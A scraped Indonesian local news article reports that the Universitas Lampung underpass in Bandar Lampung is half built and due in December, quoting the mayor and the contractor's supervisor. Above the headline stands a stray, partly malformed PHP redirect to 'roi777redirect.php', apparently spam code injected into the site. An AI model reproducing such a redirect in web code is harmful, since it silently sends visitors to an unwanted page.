header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Underpass 50 Persen, Diperkirakan Selesai Desember -
Underpass 50 Persen, Diperkirakan Selesai Desember

TRANSLAMPUNG.COM, BANDARLAMPUNG – Pembangunan underpass di simpang Universitas Lampung sudah mencapai 50 persen. Diperkirakan pada Desember nanti underpass siap digunakan.

Underpass desember digunakan, ini sudah banyak yang jadi,” kata Wali Kota Bandarlampung, Herman HN, usai melakukan sidak di underpass Unila, Rabu (11/7).

Dirinya mengatakan, nantinya untuk kendaraan yang keluar masuk Unila akan dibuatkan jalur khusus.

“Itu nanti kita pasang lantai dibawahnya untuk kendaraan keluar masuk Unila sekitar 30 meter. Kita cor di atas buat jembatan, jadi keluar masuknya nggak perlu pakai lampu merah lagi,” tandasnya.

Sementara, Kepala Pengawas Lapangan PT Sang Bima Ratu (SBR), Sutarno, mengatakan pembangunan underpass sudah mencapai 50 persen.

“Sekarang ini sedang penggalian retaining wall, penggaliannya sekitar 100 meter untuk sisi sebelah kiri,” ungkapnya.

Ia menuturkan, saat ini pihaknya mengalami kendala lantaran alat bor rusak.

“Alatnya sedang sakit, tapi kemungkinan sore ini sudah sehat lagi. Dari 640 titik, tinggal 50 titik bor yang belum dikerjakan, masing-masing ke dalamnya 9 meter. Semoga bulan ini selesai pengeborannya,” singkat Sutarno. (jef/hkw)

News Reporter